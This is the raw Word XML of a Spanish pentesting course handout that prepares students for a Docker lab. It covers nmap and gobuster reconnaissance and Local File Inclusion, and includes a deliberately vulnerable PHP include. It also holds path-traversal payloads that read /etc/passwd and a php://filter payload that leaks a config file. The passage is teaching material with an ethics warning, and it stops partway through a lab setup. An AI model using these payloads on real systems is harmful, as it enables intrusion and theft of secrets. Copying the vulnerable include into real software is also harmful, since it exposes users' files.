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EEACC" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F0A22E"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>ANTES DE OPERACIÓN HÉLICE NEGRA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494271C5" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conceptos y técnicas previas — Pentest sobre Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15136E5B"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PARA QUÉ SIRVE ESTE DOCUMENTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D6018" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Este documento NO es la práctica. Es la base teórico-práctica que debes dominar antes de abrirla. Cada bloque presenta una técnica, la ilustra con un escenario neutro (parámetros, puertos, hashes y binarios distintos a los de la práctica) y termina con una pregunta de autoevaluación. La cadena de explotación de Operación Hélice Negra usa otros artefactos — aquí no se desvela nada de su solución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED721AC" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB7BEE6" w14:textId="3E3385F2" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FCECD5"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚠ Ética. Las técnicas de este documento solo deben practicarse contra sistemas propios o expresamente autorizados. Usarlas contra infraestructura de terceros sin permiso es un delito tipificado en la mayoría de jurisdicciones. Las prácticas del curso se ejecutan SIEMPRE en laboratorios desplegados localmente por ti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371795F7" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:p w14:paraId="53238732"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spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>ENTORNO DE LOS EJEMPLOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15067CEE" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Los ejemplos asumen un host Ubuntu con Docker (consulta la sesión 0) y una máquina Kali en VirtualBox como atacante. Donde un ejemplo necesita un objetivo concreto, usaremos imágenes Docker públicas y ligeras lanzadas a propósito para el ejercicio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AE36AF" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57"/>
    <w:p w14:paraId="7CDA23D3"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spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>BLOQUE 1 — METODOLOGÍA Y RECON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579D58C7"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r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">Las cinco fases de un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61F5495D" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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945"/>
        <w:gridCol w:w="6683"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="7F7438C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0A22E"/>
          </w:tcPr>
          <w:p w14:paraId="4A639F30" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Fase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0A22E"/>
          </w:tcPr>
          <w:p w14:paraId="6ADEC68E" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Objetivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="5D2BEA6A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="28B352F5" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>1. Reconocimiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="0282560D" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Identificar la superficie expuesta (puertos, servicios, tecnologías).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="018A01CD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78CCDF77" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>2. Enumeración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="66A5CBD8" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Profundizar sobre cada servicio (versiones, rutas, usuarios).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="7EEDB007" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="2673D144" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>3. Explotación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="442FF598" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Conseguir el primer acceso aprovechando una vulnerabilidad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="1C08A09A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F870309" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>4. Post-explotación / lateral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="798C7244" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Escalar privilegios y moverse por la red interna.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5DD7" w14:paraId="1183BB6F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="1205FE34" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>5. Reporte y limpieza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8EC"/>
          </w:tcPr>
          <w:p w14:paraId="0AF5C498" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Documentar lo encontrado y restaurar el estado del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59C2720B" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139DF78D"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nmap básico para descubrir servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2E90C0" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>nmap es la herramienta universal de descubrimiento. Tres invocaciones te resolverán el 90% de los casos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A3CC1" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B73D5E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nmap -sn 10.0.2.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E151E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Detección de hosts activos (ping sweep)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F44F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04D46C01"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nmap -sV -p- --open 10.0.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64401A6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Todos los puertos TCP, sólo los abiertos, con versión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4202E4"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2175A904"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nmap -sC -sV -p 80,443 10.0.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1BD2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Scripts NSE por defecto + versión sobre dos puertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2422F5BC" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7621C29B" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3A0257" w14:textId="0A4AE437" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Salida típica abreviada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F73EE4" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0878A3A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PORT     STATE SERVICE  VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172B855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80/tcp   open  http     Apache httpd 2.4.59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA7AA4E"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443/tcp  open  ssl/http nginx 1.25.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D5FA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8080/tcp open  http     Werkzeug httpd 3.0.1 (Python 3.11.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8B8A78" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374C00A6" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓ Autoevaluación: ¿qué bandera de nmap usarías para descubrir un servicio que escucha en un puerto &gt;1024 sin saber cuál? ¿Por qué -p- es lento?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CCA695"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 xml:space="preserve">Enumeración web con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> / ffuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1F51B4" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Una vez detectado un servidor HTTP, busca rutas y ficheros ocultos. La wordlist más común en Kali es /usr/share/wordlists/dirb/common.txt; para más profundidad, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordlists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E079F2F" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128E73B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gobuster dir -u http://10.0.2.2:8080 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF9B041"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 /usr/share/wordlists/dirb/common.txt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEBB51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-x php,bak,old,zip,txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638ED00D" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D07270" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Salida típica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC32C3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/admin               (Status: 401)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84520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/api                 (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484B05B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/images              (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012657E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/old                 (Status: 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370620E4"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/server-status       (Status: 403)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01288F9E" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1A559A" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FCECD5"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚠ Códigos 401/403 NO son ‘ruta inexistente’: el servidor te está diciendo que existe pero requiere autenticación o está prohibida. Apúntalo: a veces son los caminos más interesantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952A712" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E7D32"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E7D32"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓ Autoevaluación: ¿por qué pasas -x con varias extensiones? Pista: el servidor puede servir el mismo recurso bajo nombres con extensión y sin extensión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C4FD4"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BLOQUE 2 — LFI (LOCAL FILE INCLUSION)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3F3036" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Una aplicación es vulnerable a LFI cuando inserta un parámetro de usuario en una ruta de fichero sin validarlo. Patrón típico (PHP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974DF45" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C296A4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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDFC7E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$lang = $_GET['lang'];                    // 'es', 'en', 'fr'...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730541D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include('translations/' . $lang . '.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBB82D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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539637C2" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E5F148" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470CE3F" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44662EE6"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GET /index.php?lang=es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21FBE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include('translations/es.php')        // OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CAB326" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C47A2E6" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abuso clásico — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>traversal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6318EFB0" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6341598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GET /index.php?lang=../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1543C6"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include('translations/../../../etc/passwd.php')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D5DCB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Si el código añade .php obligatorio, el ataque depende de tres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E80635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factores: la versión de PHP (null-byte en &lt;5.3), filtros wrappers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70EAA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o que la app NO añada extensión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE7233E" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3FF73C" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="F0A22E"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FCECD5"/>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="845209"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>⚠ Cuando el código concatena la extensión (.php) al final, hace falta un truco extra. En PHP moderno (≥5.3) los null bytes no terminan cadenas, así que se prueba con wrappers (php://filter/), envoltorios (zip://, phar://) o ficheros que el servidor mismo está dispuesto a leer como PHP (logs, sesiones).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FCA06D"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Lectura de ficheros con php://filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A33118" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si la inclusión se </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hace</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pero el contenido se ejecuta como PHP (estropeando la lectura </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>del fuente</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>), usa el wrapper de filtros para codificarlo en base64 antes de incluirlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B17CF2C" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9F21B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GET /index.php?lang=php://filter/convert.base64-encode/resource=config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE161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devuelve el contenido de config.php en base64, que descodificas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7102722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en local con `base64 -d`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2BCE2" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6674D4BC"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Mini-ejercicio guiado (entorno aparte)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1217B3" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Levanta este pequeño laboratorio para practicar LFI con extensión obligatoria:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CF37C" w14:textId="77777777" w:rsidR="00864C57" w:rsidRDefault="00864C57" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7023FAFA"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mkdir lfi-demo &amp;&amp; cd lfi-demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F603791"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cat &gt; index.php &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19407AF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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BAF00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$lang = $_GET['lang'] ?? 'es';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7398597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include('translations/' . $lang . '.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD519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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221125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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA25D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mkdir translations &amp;&amp; echo '&lt;?="hola"?&gt;' &gt; translations/es.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1AA1D1"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echo 'SECRET=demo123' &gt; config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE9A4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docker run --rm -p 9090:80 -v $PWD:/var/www/html php:8.2-apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163271D6" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00DD5DD7" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2845EDDE" w14:textId="77777777" w:rsidR="00DD5DD7" w:rsidRDefault="00000000" w:rsidP="00864C57">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
